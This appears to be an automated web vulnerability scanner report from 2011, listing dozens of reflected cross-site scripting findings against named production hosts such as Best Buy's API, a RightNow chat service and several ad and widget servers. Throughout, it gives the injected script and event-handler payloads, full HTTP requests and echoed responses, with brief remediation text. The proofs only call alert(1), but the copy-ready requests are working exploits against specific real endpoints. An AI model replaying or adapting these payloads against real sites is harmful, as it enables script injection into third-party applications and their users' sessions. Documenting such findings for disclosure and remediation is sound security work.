The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 820c8<script>alert(1)</script>201fb407b6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
busopsLow.BTP.retLoadBTPSKUs({ "error": { "examples": [ "/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml", "/v1/products/8880044.json?apiKey=<Your ...[SNIP]... <YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03" ], "code": 400, "message": "Couldn't understand '/v1/products(sku in(8412292)820c8<script>alert(1)</script>201fb407b6d&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&forma ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 564de<script>alert(1)</script>39279c9f405 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.168. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://api.bbyremix.bestbuy.com
Path:
/v1/products(sku%20in(8412292)&(departmentId=3))
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 82b98<script>alert(1)</script>79e8fa433a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the pageSize request parameter is copied into the HTML document as plain text between tags. The payload d5e64<script>alert(1)</script>484527ebd4e was submitted in the pageSize parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the show request parameter is copied into the HTML document as plain text between tags. The payload 6c6ee<script>alert(1)</script>9c6093a9606 was submitted in the show parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload f3a73<script>alert(1)</script>d98aef6a709 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 30842<script>alert(1)</script>de1b16eacb5 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the var request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31774%3balert(1)//23ded926607 was submitted in the var parameter. This input was echoed as 31774;alert(1)//23ded926607 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Api-Version: v2
Content-Type: application/javascript;charset=utf-8
Date: Wed, 31 Aug 2011 13:11:55 GMT
Server: nginx/1.0.4
Status: 200 OK
Vary: Accept-Encoding
Content-Length: 367
Connection: keep-alive
var s_dmdbase_v_131774;alert(1)//23ded926607={"registry_longitude":-96.8207015991211,"registry_country_code":"US","registry_state":"TX","registry_city":"Dallas","registry_latitude":32.7825012207031,"isp":true,"registry_zip_code":"75207","registr ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 633b6<script>alert(1)</script>513203d4fd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 8a155<script>alert(1)</script>ba76e2d9a34 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8425'%3balert(1)//f2815976b98 was submitted in the REST URL parameter 1. This input was echoed as a8425';alert(1)//f2815976b98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa7d9'%3balert(1)//101192a7b4c was submitted in the REST URL parameter 1. This input was echoed as aa7d9';alert(1)//101192a7b4c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d79f4'%3balert(1)//1ef7a89ad08 was submitted in the REST URL parameter 2. This input was echoed as d79f4';alert(1)//1ef7a89ad08 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a069'%3balert(1)//a554b3287db was submitted in the REST URL parameter 3. This input was echoed as 8a069';alert(1)//a554b3287db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7529b'%3balert(1)//3afc937eb48 was submitted in the REST URL parameter 4. This input was echoed as 7529b';alert(1)//3afc937eb48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e346'%3balert(1)//86988af10f8 was submitted in the REST URL parameter 5. This input was echoed as 4e346';alert(1)//86988af10f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58f10'%3balert(1)//25181935610 was submitted in the REST URL parameter 1. This input was echoed as 58f10';alert(1)//25181935610 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b47b8'%3balert(1)//83a63c7b35c was submitted in the REST URL parameter 2. This input was echoed as b47b8';alert(1)//83a63c7b35c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb460'%3balert(1)//e60c9431fa3 was submitted in the REST URL parameter 3. This input was echoed as bb460';alert(1)//e60c9431fa3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66fcf'%3balert(1)//5350e8a8c99 was submitted in the REST URL parameter 4. This input was echoed as 66fcf';alert(1)//5350e8a8c99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59514'%3balert(1)//684607607d8 was submitted in the REST URL parameter 5. This input was echoed as 59514';alert(1)//684607607d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b465'%3balert(1)//62add0462bb was submitted in the REST URL parameter 1. This input was echoed as 1b465';alert(1)//62add0462bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:35:27 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 299e0'%3balert(1)//bca7c7ba913 was submitted in the REST URL parameter 2. This input was echoed as 299e0';alert(1)//bca7c7ba913 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 2cb1d<script>alert(1)</script>45f4ec0d44a was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 79308<script>alert(1)</script>6e5cfd0a1c8 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 261ad<script>alert(1)</script>9c83b70164f was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 128f0<script>alert(1)</script>073f8a07027 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload b0e7f<script>alert(1)</script>7e360bc2df2 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload d6c0e<script>alert(1)</script>c374874210e was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 8eada<script>alert(1)</script>53915b59fa0 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 513c2<script>alert(1)</script>63f76fd61fa was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3f1a<img%20src%3da%20onerror%3dalert(1)>a456b84bccc was submitted in the REST URL parameter 3. This input was echoed as b3f1a<img src=a onerror=alert(1)>a456b84bccc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Chat/chat/rightnowb3f1a<img%20src%3da%20onerror%3dalert(1)>a456b84bccc?pool=3571:5&action=PROACTIVE_QUERY&avail_type=agents&p_db_name=rightnow&p_intf_id=1&queue_id=61&responseType=JSON&callback=rntJSONpac_1 HTTP/1.1
Host: bcvipca02.rightnowtech.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
rntJSONpac_1({"error":{"chatSystemError":{"text":"Unknown or misconfigured site specified in '/rightnowb3f1a<img src=a onerror=alert(1)>a456b84bccc' AT Wed Aug 31 11:18:05 PDT 2011","chatMessageType":"ChatSystemError","type":{"value":"CANCEL","chatMessageType":"ChatErrorType"},"errorCondition":{"value":"SERVICE_UNAVAILABLE","chatMessageType":"Cha ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload da0b6<script>alert(1)</script>d4681e8f055 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Chat/chat/rightnow?pool=3571:5&action=PROACTIVE_QUERY&avail_type=agents&p_db_name=rightnow&p_intf_id=1&queue_id=61&responseType=JSON&callback=rntJSONpac_1da0b6<script>alert(1)</script>d4681e8f055 HTTP/1.1
Host: bcvipca02.rightnowtech.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the callbackArgument request parameter is copied into the HTML document as plain text between tags. The payload ae9d7<img%20src%3da%20onerror%3dalert(1)>ceff7420d19 was submitted in the callbackArgument parameter. This input was echoed as ae9d7<img src=a onerror=alert(1)>ceff7420d19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
RightNow.Chat.Controller.ChatCommunicationsController.onPostMessageSuccess({"data":["0ae9d7<img src=a onerror=alert(1)>ceff7420d19"],"chatMessageType":"ChatMessage","responses":[{"sessionId":"1a724kt3h9vx819uympgg8zeuo","chatSystemError":{"text":"JSESSIONID not specified or invalid","chatMessageType":"ChatSystemError","type":{"va ...[SNIP]...
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload ea276<script>alert(1)</script>2c8c12f6b22 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.201. http://brocade.netshelter.net/fixed_placement.js.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://brocade.netshelter.net
Path: /fixed_placement.js.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16f4f"%3balert(1)//73dd2287075 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16f4f";alert(1)//73dd2287075 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fixed_placement.js.php?publisher=info/16f4f"%3balert(1)//73dd2287075rmit HTTP/1.1
Host: brocade.netshelter.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var NS_37_1_useDoubleClickCodes = ('%c'.length != 2);
//Include NAP window.blockNSPageTrack = true; /* IE doesn't support indexOf, so we must teach it. Normally, we wouldn't muck with * Array.prot ...[SNIP]... orting as this var NS_37_1_adSize="1x1"; // site name - any string - %s is the DART site variable - will be displayed in reporting as this //var NS_37_1_adSite="%s"; var NS_37_1_adSite = "ns." + "info/16f4f";alert(1)//73dd2287075rmit"; // click tracker - %c is the DART click tracker variable and should go at the start if we want to track via DART var NS_37_1_adClickTrack = (NS_37_1_useDoubleClickCodes ? '%c' : '') + "http://a ...[SNIP]...
The value of the publisher request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a983"%3balert(1)//1a28d2ffdbe was submitted in the publisher parameter. This input was echoed as 5a983";alert(1)//1a28d2ffdbe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fixed_placement.js.php?publisher=informit5a983"%3balert(1)//1a28d2ffdbe HTTP/1.1
Host: brocade.netshelter.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var NS_37_1_useDoubleClickCodes = ('%c'.length != 2);
//Include NAP window.blockNSPageTrack = true; /* IE doesn't support indexOf, so we must teach it. Normally, we wouldn't muck with * Array.prot ...[SNIP]... ing as this var NS_37_1_adSize="1x1"; // site name - any string - %s is the DART site variable - will be displayed in reporting as this //var NS_37_1_adSite="%s"; var NS_37_1_adSite = "ns." + "informit5a983";alert(1)//1a28d2ffdbe"; // click tracker - %c is the DART click tracker variable and should go at the start if we want to track via DART var NS_37_1_adClickTrack = (NS_37_1_useDoubleClickCodes ? '%c' : '') + "http://adv.n ...[SNIP]...
The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 1af17<script>alert(1)</script>33d62cd3122 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload c89cc<img%20src%3da%20onerror%3dalert(1)>a91674af5dd was submitted in the REST URL parameter 14. This input was echoed as c89cc<img src=a onerror=alert(1)>a91674af5dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134c89cc<img%20src%3da%20onerror%3dalert(1)>a91674af5dd/u/3/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Wed, 31 Aug 2011 21:50:36 GMT
Expires: Sat, 03 Sep 2011 21:49:36 GMT
ObjectVersions: [Inst: req 2, db 2]; [Reg: req 21, db 21];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web03
Content-Length: 5404
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d6044<a>0e177e272a8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30d6044<a>0e177e272a8/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134/u/3/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Wed, 31 Aug 2011 21:50:09 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web01
Content-Length: 1190
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 97343<script>alert(1)</script>30c35374104 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload d18a5<script>alert(1)</script>d6a4d83a2ea was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 95b5d<script>alert(1)</script>82aca6beb88 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d15fa<script>alert(1)</script>7b7135fe1a9 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /autocomplete/sp10/04/3b/7b/?max_results=200&jsonp=true&callback=preTermSuggCallbackFunctiond15fa<script>alert(1)</script>7b7135fe1a9&query=xs&d=jsonp1314795877616&_=1314795881111 HTTP/1.1
Host: content.atomz.com
Proxy-Connection: keep-alive
Referer: http://www.adobe.com/cfusion/search/index.cfm?loc=en_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 13:05:18 GMT
Content-Type: application/json
Via: 1.1 content.atomz.com:84
X-Cache: MISS from content.atomz.com
Content-Length: 136
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1f1bd<script>alert(1)</script>a2d5e472f3f was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /solr/select/?callback=jsonp13131063158131f1bd<script>alert(1)</script>a2d5e472f3f&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/
Response
HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:11:00 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2590
Date: Thu, 11 Aug 2011 23:44:31 GMT
Connection: close
The value of the fl request parameter is copied into the HTML document as plain text between tags. The payload 3303d<script>alert(1)</script>b6529cfca94 was submitted in the fl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created3303d<script>alert(1)</script>b6529cfca94&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/
Response
HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:20:38 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2482
Date: Thu, 11 Aug 2011 23:44:32 GMT
Connection: close
bbyon.ajaxReturnTaxonometricSuccess({ "responseHeader":{ "status":0, "QTime":0, "params":{ "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess", "fl":"title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created3303d<script>alert(1)</script>b6529cfca94", "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc", "indent":"on", "start":"0", "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery", "callba ...[SNIP]...
The value of the indent request parameter is copied into the HTML document as plain text between tags. The payload a4c14<script>alert(1)</script>d4c6728b788 was submitted in the indent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=ona4c14<script>alert(1)</script>d4c6728b788&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/
Response
HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:20:38 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2590
Date: Thu, 11 Aug 2011 23:44:32 GMT
Connection: close
